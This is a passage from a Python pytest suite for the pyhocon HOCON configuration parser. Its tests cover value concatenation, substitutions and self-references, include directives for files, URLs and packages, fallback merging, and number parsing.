"""
{
a: {
b: {
c = 5
}
}
a.b {
c = 7
d = 8
}
}
"""
)
assert config.get('a.b.c') == 7
assert config.get('a.b.d') == 8
def test_concat_dict(self):
config = ConfigFactory.parse_string(
"""
a: {b: 1}
a: {c: 2}
b: {c: 3} {d: 4} {
c: 5
}
"""
)
assert config.get('a.b') == 1
assert config.get('a.c') == 2
assert config.get('b.c') == 5
assert config.get('b.d') == 4
def test_concat_string(self):
config = ConfigFactory.parse_string(
"""
a = a b c
b = 5 b
c = b 7
"""
)
assert config.get('a') == 'a b c'
assert config.get('b') == '5 b'
assert config.get('c') == 'b 7'
def test_concat_list(self):
config = ConfigFactory.parse_string(
"""
a = [1, 2] [3, 4] [
5,
6
]
"""
)
assert config.get('a') == [1, 2, 3, 4, 5, 6]
assert config.get_list('a') == [1, 2, 3, 4, 5, 6]
def test_bad_concat(self):
ConfigFactory.parse_string('a = 45\n')
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string('a = [4] "4"')
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string('a = "4" [5]')
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string('a = {b: 5} "4"')
def test_string_substitutions(self):
config1 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = str
e = "str "
}
}
d = ${a.b.c}
f = ${a.b.e}
}
"""
)
assert config1.get('a.b.c') == 'str'
assert config1.get('d') == 'str'
assert config1.get('f') == 'str '
config2 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = str
e = "str "
}
}
d = test ${a.b.c}
f = test ${a.b.e}
}
"""
)
assert config2.get('a.b.c') == 'str'
assert config2.get('d') == 'test str'
assert config2.get('f') == 'test str '
config3 = ConfigFactory.parse_string(
u"""
{
a: {
b: {
c = str
e = "str "
}
}
d = test ${a.b.c} me
f = test ${a.b.e} me
}
"""
)
assert config3.get('a.b.c') == 'str'
assert config3.get('d') == 'test str me'
assert config3.get('f') == 'test str me'
def test_string_substitutions_with_no_space(self):
config = ConfigFactory.parse_string(
"""
app.heap_size = 128
app.java_opts = [
-Xms${app.heap_size}m
-Xmx${app.heap_size}m
]
"""
)
assert config.get('app.java_opts') == [
'-Xms128m',
'-Xmx128m'
]
def test_int_substitutions(self):
config1 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
d = ${a.b.c}
}
"""
)
assert config1.get('a.b.c') == 5
assert config1.get('d') == 5
config2 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
d = test ${a.b.c}
}
"""
)
assert config2.get('a.b.c') == 5
assert config2.get('d') == 'test 5'
config3 = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = 5
}
}
d = test ${a.b.c} me
}
"""
)
assert config3.get('a.b.c') == 5
assert config3.get('d') == 'test 5 me'
def test_cascade_string_substitutions(self):
config = ConfigFactory.parse_string(
"""
{
a: {
b: {
c = ${e}
}
}
d = test ${a.b.c} me
e = 7
}
"""
)
assert config.get('a.b.c') == 7
assert config.get('d') == 'test 7 me'
def test_multiple_substitutions(self):
config = ConfigFactory.parse_string(
"""
a = 5
b=${a}${a}
c=${a} ${a}
"""
)
assert config == {
'a': 5,
'b': '55',
'c': '5 5'
}
def test_dict_substitutions(self):
config = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = ${data-center-generic} {name = "east"}
"""
)
assert config.get('data-center-east.cluster-size') == 6
assert config.get('data-center-east.name') == 'east'
config2 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = {name = "east"} ${data-center-generic}
"""
)
assert config2.get('data-center-east.cluster-size') == 6
assert config2.get('data-center-east.name') == 'east'
config3 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = {name = "east"} ${data-center-generic} { cluster-size = 9, opts = "-Xmx4g" }
"""
)
assert config3.get('data-center-east.cluster-size') == 9
assert config3.get('data-center-east.name') == 'east'
assert config3.get('data-center-east.opts') == '-Xmx4g'
config4 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = {name = "east"} ${data-center-generic}
data-center-east-prod = ${data-center-east} {tmpDir=/tmp}
"""
)
assert config4.get('data-center-east.cluster-size') == 6
assert config4.get('data-center-east.name') == 'east'
assert config4.get('data-center-east-prod.cluster-size') == 6
assert config4.get('data-center-east-prod.tmpDir') == '/tmp'
config5 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = ${data-center-generic}
data-center-east = { name = "east" }
"""
)
assert config5['data-center-east'] == {
'name': 'east',
'cluster-size': 6
}
config6 = ConfigFactory.parse_string(
"""
data-center-generic = { cluster-size = 6 }
data-center-east = { name = "east" }
data-center-east = ${data-center-generic}
"""
)
assert config6['data-center-east'] == {
'name': 'east',
'cluster-size': 6
}
def test_dos_chars_with_unquoted_string_noeol(self):
config = ConfigFactory.parse_string("foo = bar")
assert config['foo'] == 'bar'
def test_dos_chars_with_quoted_string_noeol(self):
config = ConfigFactory.parse_string('foo = "5"')
assert config['foo'] == '5'
def test_dos_chars_with_triple_quoted_string_noeol(self):
config = ConfigFactory.parse_string('foo = """5"""')
assert config['foo'] == '5'
def test_dos_chars_with_int_noeol(self):
config = ConfigFactory.parse_string("foo = 5")
assert config['foo'] == 5
def test_dos_chars_with_float_noeol(self):
config = ConfigFactory.parse_string("foo = 5.0")
assert config['foo'] == 5.0
def test_list_substitutions(self):
config = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = ${common_modules} [java]
"""
)
assert config.get('host_modules') == ['php', 'python', 'java']
config2 = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = [java] ${common_modules}
"""
)
assert config2.get('host_modules') == ['java', 'php', 'python']
config3 = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = [java] ${common_modules} [perl]
"""
)
assert config3.get('common_modules') == ['php', 'python']
assert config3.get('host_modules') == ['java', 'php', 'python', 'perl']
config4 = ConfigFactory.parse_string(
"""
common_modules = [php, python]
host_modules = [java] ${common_modules} [perl]
full_modules = ${host_modules} [c, go]
"""
)
assert config4.get('common_modules') == ['php', 'python']
assert config4.get('host_modules') == ['java', 'php', 'python', 'perl']
assert config4.get('full_modules') == ['java', 'php', 'python', 'perl', 'c', 'go']
def test_list_element_substitution(self):
config = ConfigFactory.parse_string(
"""
main_language = php
languages = [java, ${main_language}]
"""
)
assert config.get('languages') == ['java', 'php']
def test_substitution_list_with_append(self):
config = ConfigFactory.parse_string(
"""
application.foo = 128mm
application.large-jvm-opts = ["-XX:+UseParNewGC"] [-Xm16g, ${application.foo}]
application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ["-XX:+UseParNewGC"]
""")
assert config["application.large-jvm-opts"] == [
'-XX:+UseParNewGC',
'-Xm16g',
'128mm'
]
assert config["application.large-jvm-opts2"] == [
'-Xm16g',
'128mm',
'-XX:+UseParNewGC',
]
def test_substitution_list_with_append_substitution(self):
config = ConfigFactory.parse_string(
"""
application.foo = 128mm
application.default-jvm-opts = ["-XX:+UseParNewGC"]
application.large-jvm-opts = ${application.default-jvm-opts} [-Xm16g, ${application.foo}]
application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ${application.default-jvm-opts}
""")
assert config["application.large-jvm-opts"] == [
'-XX:+UseParNewGC',
'-Xm16g',
'128mm'
]
assert config["application.large-jvm-opts2"] == [
'-Xm16g',
'128mm',
'-XX:+UseParNewGC'
]
def test_non_existent_substitution(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = ${non_existent}
"""
)
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = abc ${non_existent}
"""
)
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = ${non_existent} abc
"""
)
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
common_modules = abc ${non_existent} def
"""
)
def test_non_compatible_substitution(self):
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = 55 ${common_modules}
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = ${common_modules} 55
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = aa ${common_modules} bb
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = aa ${common_modules}
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = ${common_modules} aa
"""
)
with pytest.raises(ConfigWrongTypeException):
ConfigFactory.parse_string(
"""
common_modules = [perl]
host_modules = aa ${common_modules} bb
"""
)
def test_self_ref_substitution_array(self):
config = ConfigFactory.parse_string(
"""
x = [1,2]
x = ${x} [3,4]
x = [-1, 0] ${x} [5, 6]
x = [-3, -2] ${x}
"""
)
assert config.get("x") == [-3, -2, -1, 0, 1, 2, 3, 4, 5, 6]
def test_self_append_array(self):
config = ConfigFactory.parse_string(
"""
x = [1,2]
x += [3,4]
"""
)
assert config.get("x") == [1, 2, 3, 4]
def test_self_append_string(self):
'''
Should be equivalent to
x = abc
x = ${?x} def
'''
config = ConfigFactory.parse_string(
"""
x = abc
x += def
"""
)
assert config.get("x") == "abc def"
def test_self_append_non_existent_string(self):
'''
Should be equivalent to x = ${?x} def
'''
config = ConfigFactory.parse_string(
"""
x += def
"""
)
assert config.get("x") == " def"
def test_self_append_nonexistent_array(self):
config = ConfigFactory.parse_string(
"""
x += [1,2]
"""
)
assert config.get("x") == [1, 2]
def test_self_append_object(self):
config = ConfigFactory.parse_string(
"""
x = {a: 1}
x += {b: 2}
"""
)
assert config.get("x") == {'a': 1, 'b': 2}
def test_self_append_nonexistent_object(self):
config = ConfigFactory.parse_string(
"""
x += {a: 1}
"""
)
assert config.get("x") == {'a': 1}
def test_self_ref_substitution_array_to_dict(self):
config = ConfigFactory.parse_string(
"""
x = [1,2]
x = {x: [3,4]}
x = {y: [5,6]}
x = {z: ${x}}
"""
)
assert config.get("x.x") == [3, 4]
assert config.get("x.y") == [5, 6]
assert config.get("x.z") == {'x': [3, 4], 'y': [5, 6]}
def test_self_ref_substitiotion_dict_in_array(self):
config = ConfigFactory.parse_string(
"""
x = {x: [3,4]}
x = [${x}, 2, 3]
"""
)
(one, two, three) = config.get("x")
assert one == {'x': [3, 4]}
assert two == 2
assert three == 3
def test_self_ref_substitution_dict_path(self):
config = ConfigFactory.parse_string(
"""
x = {y: {z: 1}}
x = ${x.y}
"""
)
assert config.get("x.y") == {'z': 1}
assert config.get("x.z") == 1
assert set(config.get("x").keys()) == set(['y', 'z'])
def test_self_ref_substitution_dict_path_hide(self):
config = ConfigFactory.parse_string(
"""
x = {y: {y: 1}}
x = ${x.y}
"""
)
assert config.get("x.y") == 1
assert set(config.get("x").keys()) == set(['y'])
def test_self_ref_substitution_dict_recurse(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
x = ${x}
"""
)
def test_self_ref_substitution_dict_recurse2(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
x = ${x}
x = ${x}
"""
)
def test_self_ref_substitution_dict_merge(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
foo : { a : { c : 1 } }
foo : ${foo.a}
foo : { a : 2 }
"""
)
assert config.get('foo') == {'a': 2, 'c': 1}
assert set(config.keys()) == set(['foo'])
def test_self_ref_substitution_dict_otherfield(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
bar : {
foo : 42,
baz : ${bar.foo}
}
"""
)
assert config.get("bar") == {'foo': 42, 'baz': 42}
assert set(config.keys()) == set(['bar'])
def test_self_ref_substitution_dict_otherfield_merged_in(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
bar : {
foo : 42,
baz : ${bar.foo}
}
bar : { foo : 43 }
"""
)
assert config.get("bar") == {'foo': 43, 'baz': 43}
assert set(config.keys()) == set(['bar'])
def test_self_ref_substitution_dict_otherfield_merged_in_mutual(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
// bar.a should end up as 4
bar : { a : ${foo.d}, b : 1 }
bar.b = 3
// foo.c should end up as 3
foo : { c : ${bar.b}, d : 2 }
foo.d = 4
"""
)
assert config.get("bar") == {'a': 4, 'b': 3}
assert config.get("foo") == {'c': 3, 'd': 4}
assert set(config.keys()) == set(['bar', 'foo'])
def test_self_ref_substitution_string_opt_concat(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
a = ${?a}foo
"""
)
assert config.get("a") == 'foo'
assert set(config.keys()) == set(['a'])
def test_self_ref_substitution_dict_recurse_part(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
x = ${x} {y: 1}
x = ${x.y}
"""
)
def test_self_ref_substitution_object(self):
config = ConfigFactory.parse_string(
"""
x = {a: 1, b: 2}
x = ${x} {c: 3}
x = {z: 0} ${x}
x = {y: -1} ${x} {d: 4}
"""
)
assert config.get("x") == {'a': 1, 'b': 2, 'c': 3, 'z': 0, 'y': -1, 'd': 4}
def test_self_ref_child(self):
config = ConfigFactory.parse_string(
"""
a.b = 3
a.b = ${a.b}
a.b = ${a.b}
a.c = [1,2]
a.c = ${a.c}
a.d = {foo: bar}
a.d = ${a.d}
"""
)
assert config.get("a") == {'b': 3, 'c': [1, 2], 'd': {'foo': 'bar'}}
def test_concat_multi_line_string(self):
config = ConfigFactory.parse_string(
"""
common_modules = perl \
java \
python
"""
)
assert [x.strip() for x in config['common_modules'].split() if x.strip(' ') != ''] == ['perl', 'java', 'python']
def test_concat_multi_line_list(self):
config = ConfigFactory.parse_string(
"""
common_modules = [perl] \
[java] \
[python]
"""
)
assert config['common_modules'] == ['perl', 'java', 'python']
def test_concat_multi_line_dict(self):
config = ConfigFactory.parse_string(
"""
common_modules = {a:perl} \
{b:java} \
{c:python}
"""
)
assert config['common_modules'] == {'a': 'perl', 'b': 'java', 'c': 'python'}
def test_parse_URL_from_samples(self):
config = ConfigFactory.parse_URL("file:samples/aws.conf")
assert config.get('data-center-generic.cluster-size') == 6
assert config.get('large-jvm-opts') == ['-XX:+UseParNewGC', '-Xm16g']
def test_parse_URL_from_invalid(self):
config = ConfigFactory.parse_URL("https://nosuchurl")
assert config == []
def test_include_dict_from_samples(self):
config = ConfigFactory.parse_file("samples/animals.conf")
assert config.get('cat.garfield.say') == 'meow'
assert config.get('dog.mutt.hates.garfield.say') == 'meow'
def test_include_glob_dict_from_samples(self):
config = ConfigFactory.parse_file("samples/all_animals.conf")
assert config.get('animals.garfield.say') == 'meow'
assert config.get('animals.mutt.hates.garfield.say') == 'meow'
def test_include_glob_list_from_samples(self):
config = ConfigFactory.parse_file("samples/all_bars.conf")
bars = config.get_list('bars')
assert len(bars) == 10
names = {bar['name'] for bar in bars}
types = {bar['type'] for bar in bars if 'type' in bar}
print(types, '(((((')
assert '<NAME>' in names
assert 'Homer\'s favorite coffee' in names
assert 'milk' in types
def test_list_of_dicts(self):
config = ConfigFactory.parse_string(
"""
a: [
{a: 1, b: 2},
{a: 3, c: 4},
]
"""
)
assert config['a'] == [
{'a': 1, 'b': 2},
{'a': 3, 'c': 4}
]
def test_list_of_lists(self):
config = ConfigFactory.parse_string(
"""
a: [
[1, 2]
[3, 4]
]
"""
)
assert config['a'] == [
[1, 2],
[3, 4]
]
def test_list_of_dicts_with_merge(self):
config = ConfigFactory.parse_string(
"""
b = {f: 4}
a: [
${b} {a: 1, b: 2},
{a: 3, c: 4} ${b},
{a: 3} ${b} {c: 6},
]
"""
)
assert config['a'] == [
{'a': 1, 'b': 2, 'f': 4},
{'a': 3, 'c': 4, 'f': 4},
{'a': 3, 'c': 6, 'f': 4}
]
def test_list_of_lists_with_merge(self):
config = ConfigFactory.parse_string(
"""
b = [5, 6]
a: [
${b} [1, 2]
[3, 4] ${b}
[1, 2] ${b} [7, 8]
]
"""
)
assert config['a'] == [
[5, 6, 1, 2],
[3, 4, 5, 6],
[1, 2, 5, 6, 7, 8]
]
def test_invalid_assignment(self):
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string('common_modules [perl]')
with pytest.raises(ParseException):
ConfigFactory.parse_string('common_modules {} {perl: 1}')
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string(
"""
a = {f: 5}
common_modules ${a} {perl: 1}
""")
def test_invalid_dict(self):
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string(
"""
a = {
f: 5
g
}
""")
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string('a = {g}')
def test_include_file(self):
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('[1, 2]')
fdin.flush()
config1 = ConfigFactory.parse_string(
"""
a: [
include "{tmp_file}"
]
""".format(tmp_file=fdin.name)
)
assert config1['a'] == [1, 2]
config2 = ConfigFactory.parse_string(
"""
a: [
include file("{tmp_file}")
]
""".format(tmp_file=fdin.name)
)
assert config2['a'] == [1, 2]
config3 = ConfigFactory.parse_string(
"""
a: [
include url("file://{tmp_file}")
]
""".format(tmp_file=fdin.name)
)
assert config3['a'] == [1, 2]
def test_include_missing_file(self):
config1 = ConfigFactory.parse_string(
"""
a: [
include "dummy.txt"
3
4
]
"""
)
assert config1['a'] == [3, 4]
def test_include_required_file(self):
config = ConfigFactory.parse_string(
"""
a {
include required("samples/animals.d/cat.conf")
t = 2
}
"""
)
expected = {
'a': {
'garfield': {
'say': 'meow'
},
't': 2
}
}
assert expected == config
config2 = ConfigFactory.parse_string(
"""
a {
include required(file("samples/animals.d/cat.conf"))
t = 2
}
"""
)
assert expected == config2
def test_include_missing_required_file(self):
with pytest.raises(IOError):
ConfigFactory.parse_string(
"""
a: [
include required("dummy.txt")
3
4
]
"""
)
def test_resolve_package_path(self):
path = ConfigParser.resolve_package_path("pyhocon:config_parser.py")
assert os.path.exists(path)
def test_resolve_package_path_format(self):
with pytest.raises(ValueError):
ConfigParser.resolve_package_path("pyhocon/config_parser.py")
def test_resolve_package_path_missing(self):
with pytest.raises(ImportError):
ConfigParser.resolve_package_path("non_existent_module:foo.py")
def test_include_package_file(self, monkeypatch):
temp_dir = tempfile.mkdtemp()
try:
module_dir = os.path.join(temp_dir, 'my_module')
module_conf = os.path.join(module_dir, 'my.conf')
# create the module folder and necessary files (__init__ and config)
os.mkdir(module_dir)
open(os.path.join(module_dir, '__init__.py'), 'a').close()
with open(module_conf, 'w') as fdin:
fdin.write("{c: 3}")
# add the temp dir to sys.path so that 'my_module' can be discovered
monkeypatch.syspath_prepend(temp_dir)
# load the config and include the other config file from 'my_module'
config = ConfigFactory.parse_string(
"""
a: 1
b: 2
include package("my_module:my.conf")
"""
)
# check that the contents of both config files are available
assert dict(config.as_plain_ordered_dict()) == {'a': 1, 'b': 2, 'c': 3}
finally:
shutil.rmtree(temp_dir, ignore_errors=True)
def test_include_dict(self):
expected_res = {
'a': 1,
'b': 2,
'c': 3,
'd': 4
}
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('{a: 1, b: 2}')
fdin.flush()
config1 = ConfigFactory.parse_string(
"""
a: {{
include "{tmp_file}"
c: 3
d: 4
}}
""".format(tmp_file=fdin.name)
)
assert config1['a'] == expected_res
config2 = ConfigFactory.parse_string(
"""
a: {{
c: 3
d: 4
include "{tmp_file}"
}}
""".format(tmp_file=fdin.name)
)
assert config2['a'] == expected_res
config3 = ConfigFactory.parse_string(
"""
a: {{
c: 3
include "{tmp_file}"
d: 4
}}
""".format(tmp_file=fdin.name)
)
assert config3['a'] == expected_res
def test_include_substitution(self):
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('y = ${x}')
fdin.flush()
config = ConfigFactory.parse_string(
"""
include "{tmp_file}"
x = 42
""".format(tmp_file=fdin.name)
)
assert config['x'] == 42
assert config['y'] == 42
@pytest.mark.xfail
def test_include_substitution2(self):
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('{ x : 10, y : ${x} }')
fdin.flush()
config = ConfigFactory.parse_string(
"""
{
a : { include """ + '"' + fdin.name + """" }
a : { x : 42 }
}
"""
)
assert config['a']['x'] == 42
assert config['a']['y'] == 42
def test_var_with_include_keyword(self):
config = ConfigFactory.parse_string(
"""
include-database=true
""")
assert config == {
'include-database': True
}
def test_substitution_override(self):
config = ConfigFactory.parse_string(
"""
database {
host = localhost
port = 5432
user = people
name = peopledb
pass = <PASSWORD>
}
user=test_user
pass=<PASSWORD>
database {
user = ${user}
pass = ${pass}
}
""")
assert config['database.user'] == 'test_user'
assert config['database.pass'] == '<PASSWORD>'
def test_substitution_flat_override(self):
config = ConfigFactory.parse_string(
"""
database {
name = peopledb
pass = <PASSWORD>
name = ${?NOT_EXISTS}
pass = ${?NOT_EXISTS}
}
""")
assert config['database.name'] == 'peopledb'
assert config['database.pass'] == '<PASSWORD>'
def test_substitution_multiple_override(self):
config = ConfigFactory.parse_string(
"""
a: 1
b: foo
c: ${a} ${b}
c: ${b} ${a}
d: ${a} ${b}
d: ${a} bar
""")
assert config['c'] == 'foo 1'
assert config['d'] == '1 bar'
def test_substitution_nested_override(self):
config = ConfigFactory.parse_string(
"""
database {
name = peopledb
pass = <PASSWORD>
}
database {
name = ${?user}
pass = ${?pass}
}
""")
assert config['database.name'] == 'peopledb'
assert config['database.pass'] == '<PASSWORD>'
def test_optional_with_merge(self):
unresolved = ConfigFactory.parse_string(
"""
foo: 42
foo: ${?a}
""", resolve=False)
source = ConfigFactory.parse_string(
"""
b: 14
""")
config = unresolved.with_fallback(source)
assert config['foo'] == 42
config = source.with_fallback(unresolved)
assert config['foo'] == 42
def test_fallback_with_resolve(self):
config3 = ConfigFactory.parse_string("c=5")
config2 = ConfigFactory.parse_string("b=${c}", resolve=False)
config1 = ConfigFactory.parse_string("a=${b}", resolve=False) \
.with_fallback(config2, resolve=False) \
.with_fallback(config3)
assert {'a': 5, 'b': 5, 'c': 5} == config1
def test_optional_substitution(self):
config = ConfigFactory.parse_string(
"""
a = 45
b = ${?c}
d = ${?c} 4
e = ${?a}
g = ${?c1} ${?c2}
h = ${?c1} ${?c2} 1
""")
assert 'b' not in config
assert config['d'] == 4
assert config['e'] == 45
assert 'g' not in config
assert config['h'] == 1
def test_cascade_optional_substitution(self):
config = ConfigFactory.parse_string(
"""
num = 3
retries_msg = You have ${num} retries
retries_msg = ${?CUSTOM_MSG}
""")
assert config == {
'num': 3,
'retries_msg': 'You have 3 retries'
}
def test_substitution_cycle(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
a = ${b}
b = ${c}
c = ${a}
""")
def test_assign_number_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
4
b = # test
# test2
5
c =
6
"""
)
assert config['a'] == 4
assert config['b'] == 5
assert config['c'] == 6
def test_assign_int(self):
config = ConfigFactory.parse_string(
"""
short = 12
long = 12321321837612378126213217321
negative = -15
"""
)
# on python 3 long will be an int but on python 2 long with be a long
assert config['short'] == 12
assert isinstance(config['short'], int)
assert config['long'] == 12321321837612378126213217321
assert isinstance(config['negative'], int)
assert config['negative'] == -15
def test_assign_float(self):
config = ConfigFactory.parse_string(
"""
a = 121.22
b = -121.22
c = .54
d = -.54
"""
)
# on python 3 long will be an int but on python 2 long with be a long
assert config['a'] == 121.22
assert config['b'] == -121.22
assert config['c'] == .54
assert config['d'] == -.54
def test_sci_real(self):
"""
Test scientific expression of number
"""
config = ConfigFactory.parse_string(
"""
short = 12.12321
long1 = 121.22E3423432
neg_long1 = 121.22E-1
long2 = 121.22e3423432
neg_long2 = 121.22e-3
"""
)
# on python 3 long will be an int but on python 2 long with be a long
assert config['short'] == 12.12321
assert config['long1'] == 121.22E3423432
assert config['neg_long1'] == 121.22E-1
assert config['long2'] == 121.22E3423432
assert config['neg_long2'] == 121.22E-3
def test_assign_strings_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
"a"
b = # test
# test2
"b"
c =
"c"
"""
)
assert config['a'] == 'a'
assert config['b'] == 'b'
assert config['c'] == 'c'
def test_assign_list_numbers_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
[
1,
2,
]
b = # test
# test2
[
3,
4,]
c =
[
5,
6
]
"""
)
assert config['a'] == [1, 2]
assert config['b'] == [3, 4]
assert config['c'] == [5, 6]
def test_assign_list_strings_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
[
"a",
"b",
]
b = # test
# test2
[
"c",
"d",]
c =
[
"e",
"f"
]
"""
)
assert config['a'] == ['a', 'b']
assert config['b'] == ['c', 'd']
assert config['c'] == ['e', 'f']
def test_assign_dict_strings_with_equal_sign_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
{
a: 1,
b: 2,
}
b = # test
# test2
{
c: 3,
d: 4,}
c =
{
e: 5,
f: 6
}
"""
)
assert config['a'] == {'a': 1, 'b': 2}
assert config['b'] == {'c': 3, 'd': 4}
assert config['c'] == {'e': 5, 'f': 6}
def test_assign_dict_strings_no_equal_sign_with_eol(self):
config = ConfigFactory.parse_string(
"""
a
{
a: 1,
b: 2,
}
b # test
# test2
{
c: 3,
d: 4,}
c
{
e: 5,
f: 6
}
"""
)
assert config['a'] == {'a': 1, 'b': 2}
assert config['b'] == {'c': 3, 'd': 4}
assert config['c'] == {'e': 5, 'f': 6}
def test_substitutions_overwrite(self):
config1 = ConfigFactory.parse_string(
"""
a = 123
a = ${?test}
a = 5
"""
)
assert config1['a'] == 5
config2 = ConfigFactory.parse_string(
"""
{
database {
host = "localhost"
port = 8000
url = ${database.host}":"${database.port}
}
database {
host = ${?DB_HOST}
}
database {
host = "other.host.net"
port = 433
}
}
"""
)
assert config2['database']['host'] == 'other.host.net'
assert config2['database']['port'] == 433
assert config2['database']['url'] == 'other.host.net:433'
def test_fallback_substitutions_overwrite(self):
config1 = ConfigFactory.parse_string(
"""
a = {
b: 1
c: 2
}
"""
)
config2 = ConfigFactory.parse_string(
"""
a.b = 4
a.d = 3
"""
)
config3 = config1.with_fallback(config2)
assert config3['a'] == {
'b': 1,
'c': 2,
'd': 3
}
config4 = ConfigFactory.parse_string(
"""
name: foo
"""
)
config5 = ConfigFactory.parse_string(
u"""
longName: "long "${?name}
""",
resolve=False
)
config6 = config4.with_fallback(config5)
assert config6 == {
'longName': 'long foo',
'name': 'foo'
}
def test_fallback_substitutions_overwrite_file(self):
config1 = ConfigFactory.parse_string(
"""
{
data-center-generic = { cluster-size: 8 }
misc = "mist"
}
"""
)
# use unicode path here for regression testing https://github.com/chimpler/pyhocon/issues/44
config2 = config1.with_fallback(u'samples/aws.conf')
assert config2 == {
'data-center-generic': {'cluster-size': 8},
'data-center-east': {'cluster-size': 8, 'name': 'east'},
'misc': 'mist',
'default-jvm-opts': ['-XX:+UseParNewGC'],
'large-jvm-opts': ['-XX:+UseParNewGC', '-Xm16g']
}
def test_fallback_self_ref_substitutions_append(self):
config1 = ConfigFactory.parse_string(
"""
list = [ 1, 2, 3 ]
"""
)
config2 = ConfigFactory.parse_string(
"""
list = ${list} [ 4, 5, 6 ]
""",
resolve=False
)
config2 = config2.with_fallback(config1)
assert config2.get("list") == [1, 2, 3, 4, 5, 6]
def test_fallback_self_ref_substitutions_append_plus_equals(self):
config1 = ConfigFactory.parse_string(
"""
list = [ 1, 2, 3 ]
"""
)
config2 = ConfigFactory.parse_string(
"""
list += [ 4, 5, 6 ]
""",
resolve=False
)
config2 = config2.with_fallback(config1)
assert config2.get("list") == [1, 2, 3, 4, 5, 6]
def test_self_merge_ref_substitutions_object(self):
config1 = ConfigFactory.parse_string(
"""
a : { }
b : 1
c : ${a} { d : [ ${b} ] }
""",
resolve=False
)
config2 = ConfigFactory.parse_string(
"""
e : ${a} {
}
""",
resolve=False
)
merged = ConfigTree.merge_configs(config1, config2)
ConfigParser.resolve_substitutions(merged)
assert merged.get("c.d") == [1]
def test_self_merge_ref_substitutions_object2(self):
config1 = ConfigFactory.parse_string(
"""
x : { v1: 1 }
b1 : {v2: 2 }
b = [${b1}]
""",
resolve=False
)
config2 = ConfigFactory.parse_string(
"""
b2 : ${x} {v2: 3}
b += [${b2}]
""",
resolve=False
)
merged = ConfigTree.merge_configs(config1, config2)
ConfigParser.resolve_substitutions(merged)
b = merged.get("b")
assert len(b) == 2
assert b[0] == {'v2': 2}
assert b[1] == {'v1': 1, 'v2': 3}
def test_self_merge_ref_substitutions_object3(self):
config1 = ConfigFactory.parse_string(
"""
b1 : { v1: 1 }
b = [${b1}]
""",
resolve=False
)
config2 = ConfigFactory.parse_string(
"""
b1 : { v1: 2, v2: 3 }
""",
resolve=False
)
merged = ConfigTree.merge_configs(config1, config2)
ConfigParser.resolve_substitutions(merged)
assert merged.get("b1") == {"v1": 2, "v2": 3}
b = merged.get("b")
assert len(b) == 1
assert b[0] == {"v1": 2, "v2": 3}
def test_fallback_self_ref_substitutions_merge(self):
config1 = ConfigFactory.parse_string(
"""
dict = { x: 1 }
"""
)
config2 = ConfigFactory.parse_string(
"""
dict = ${dict} { y: 2 }
""",
resolve=False
)
config2 = config2.with_fallback(config1)
assert config2.get("dict") == {'x': 1, 'y': 2}
def test_fallback_self_ref_substitutions_concat_string(self):
config1 = ConfigFactory.parse_string(
"""
string = abc
"""
)
config2 = ConfigFactory.parse_string(
"""
string = ${string}def
""",
resolve=False
)
result = config2.with_fallback(config1)
assert result.get("string") == 'abcdef'
# test no mutation on config1
assert result is not config1
# test no mutation on config2
assert "abc" not in str(config2)
def test_fallback_non_root(self):
root = ConfigFactory.parse_string(
"""
a = 1
mid.b = 1
"""
)
config = root.get_config("mid").with_fallback(root)
